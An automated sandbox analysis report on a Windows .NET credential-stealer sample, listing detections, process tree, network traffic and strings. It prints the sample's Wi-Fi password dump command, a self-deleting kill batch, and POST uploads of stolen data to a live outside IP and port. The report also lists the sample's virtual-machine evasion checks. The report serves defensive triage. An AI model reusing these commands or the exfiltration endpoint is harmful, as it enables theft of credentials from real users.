
Windows Analysis Report
bPkG0wTVon.exe

Overview

General Information

Sample name: bPkG0wTVon.exe
Analysis ID: 1578055
MD5: 36274aefe69f86532cee326b878f06ff
SHA1: 6a33fb45bfa496c8559947640ae044b1d78d39b8
SHA256: 24616a11af126a9d80991d575949abcef8b0e30b816a1ddc3e1d0f63fe380e89

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • bPkG0wTVon.exe (PID: 8592 cmdline: "C:\Users\user\Desktop\bPkG0wTVon.exe" MD5: 36274AEFE69F86532CEE326B878F06FF)
    • cmd.exe (PID: 7400 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7288 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 7384 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 6548 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 9252 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 9260 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 1560 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 3652 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 2132 cmdline: TaskKill /F /IM 8592 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 9728 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 9760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author; no matched strings are listed):
Source: bPkG0wTVon.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: Process Memory Space: bPkG0wTVon.exe PID: 8592 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0.0.bPkG0wTVon.exe.120000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

          Stealing of Sensitive Information

          Source: Process started; Author: Joe Security; Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\bPkG0wTVon.exe", ParentImage: C:\Users\user\Desktop\bPkG0wTVon.exe, ParentProcessId: 8592, ParentProcessName: bPkG0wTVon.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 7384, ProcessName: cmd.exe
          Suricata alert: Timestamp: 2024-12-19T08:26:14.011328+0100 | SID: 2843856 | Severity: 1 | Classtype: A Network Trojan was detected | Source IP: 192.168.11.20 | Source Port: 49718 | Destination IP: 89.23.100.233 | Destination Port: 1490 | Protocol: TCP

          AV Detection

          Source: bPkG0wTVon.exe | Avira: detected
          Source: bPkG0wTVon.exe | Virustotal: Detection: 30%
          Source: bPkG0wTVon.exe | ReversingLabs: Detection: 52%
          Source: bPkG0wTVon.exe | Joe Sandbox ML: detected
          Source: bPkG0wTVon.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: bPkG0wTVon.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Xml.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: bPkG0wTVon.exe
          Source: Binary string: C:\Users\Raifon\source\repos\Arcana\Arcana\bin\Release\Arcana.pdb source: bPkG0wTVon.exe
          Source: Binary string: System.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdbt source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Security.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*ata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: Arcana.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdbH source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdbRSDS] source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdbp source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb" source: bPkG0wTVon.exe
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Web.pdb source: WERB95F.tmp.dmp.24.dr

          Networking

          Source: Network traffic | Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49718 -> 89.23.100.233:1490
          Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 1490
          Source: unknown | Network traffic detected: HTTP traffic on port 1490 -> 49718 (this entry appears 3 times in the report)
          Source: Yara match | File source: bPkG0wTVon.exe, type: SAMPLE
          Source: Yara match | File source: 0.0.bPkG0wTVon.exe.120000.0.unpack, type: UNPACKEDPE
          Source: global traffic | TCP traffic: 192.168.11.20:49718 -> 89.23.100.233:1490
          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: icanhazip.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: POST /upload HTTP/1.1 | Content-Type: multipart/form-data; boundary="6d617208-f1f4-415c-8f95-dec90f8a5da2" | Host: 89.23.100.233:1490 | Content-Length: 133579 | Expect: 100-continue | Connection: Keep-Alive
          Source: Joe Sandbox View | IP Address: 89.23.100.233 (this entry appears twice in the report)
          Source: Joe Sandbox View | IP Address: 104.16.184.241
          Source: Joe Sandbox View | ASN Name: MAXITEL-ASRU
          Source: unknown | DNS query: name: icanhazip.com
          Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.100.233 (this entry is repeated 50 times in the report)
          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: icanhazip.com | Connection: Keep-Alive
          Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
          Source: global traffic | DNS traffic detected: DNS query: 245.246.1.0.in-addr.arpa
          Source: unknown | HTTP traffic detected: POST /upload HTTP/1.1 | Content-Type: multipart/form-data; boundary="6d617208-f1f4-415c-8f95-dec90f8a5da2" | Host: 89.23.100.233:1490 | Content-Length: 133579 | Expect: 100-continue | Connection: Keep-Alive
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002A03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.100.233:1490
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.100.233:1490/upload
          Source: bPkG0wTVon.exe | String found in binary or memory: http://89.23.100.233:1490/upload?File
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002A03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://89.23.100.233:1490t-
          Source: bPkG0wTVon.exe, 00000000.00000002.1512294678.00000000702F1000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.24.dr | String found in binary or memory: http://upx.sf.net
          Source: tmp919C.tmp.dat.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: tmp919C.tmp.dat.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: tmp919C.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: tmp919C.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: tmp919C.tmp.dat.0.dr | String found in binary or memory: https://gemini.google.com/app?q=
          Source: tmp919B.tmp.dat.0.dr | String found in binary or memory: https://login.live.com/
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002919000.00000004.00000800.00020000.00000000.sdmp, tmp919B.tmp.dat.0.dr | String found in binary or memory: https://login.live.com//
          Source: tmp919B.tmp.dat.0.dr | String found in binary or memory: https://login.live.com/https://login.live.com/
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002919000.00000004.00000800.00020000.00000000.sdmp, tmp919B.tmp.dat.0.dr | String found in binary or memory: https://login.live.com/v104
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.dr | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.dr | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, tmp918A.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Window created: window name: CLIPBRDWNDCLASS

          System Summary

          Source: bPkG0wTVon.exe | Static PE information: section name: .\C3
          Source: bPkG0wTVon.exe | Static PE information: section name: ."@W
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D33E68 NtClose
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34740 NtOpenFile
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34818 NtCreateSection
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D349C0 NtMapViewOfSection
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34AB0 NtQueryVolumeInformationFile
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D343F8 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34B78 NtDeviceIoControlFile
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34320 NtProtectVirtualMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D33E63 NtClose
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D3473B NtOpenFile
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34810 NtCreateSection
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D349B8 NtMapViewOfSection
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34AA9 NtQueryVolumeInformationFile
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D343F3 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34B70 NtDeviceIoControlFile
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34318 NtProtectVirtualMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34B78: NtDeviceIoControlFile
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026ABAE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A9310
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A1098
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026AB1B8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A8EC8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A9700
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026ABD68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026AD5E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026ABAD1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026AF3B1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026AB83B
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A1089
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A9E40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A8EB8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026A9F69
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_026AD5E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34C50
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D3CE00
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D36F98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D3E733
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D320C0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D30990
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D33398
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D314D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D364D8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D364C8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D31C90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D314A3
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D34C40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D3CDFB
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D30EF0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D37830
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D33828
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D30980
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_04D3E733
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF4553
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFB570
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF60D8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFF0D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFF880
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFDCA0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFAFD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF076F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF4F68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF6AD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFCEE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF9A88
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF26A0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF0E78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFCA70
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF1A10
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF3A2F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF7D48
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFB560
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFDC90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF8048
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFF873
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFF070
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFF870
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFA7D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF9FD0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFA7C4
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF9FE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF53B8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DF2F18
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFCECF
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082575200_2_08257520
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08250D280_2_08250D28
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825BA300_2_0825BA30
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825B9100_2_0825B910
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825E5100_2_0825E510
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825D5180_2_0825D518
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825DF600_2_0825DF60
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08251A680_2_08251A68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08259C680_2_08259C68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825CF680_2_0825CF68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C0700_2_0825C070
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08257F780_2_08257F78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082500400_2_08250040
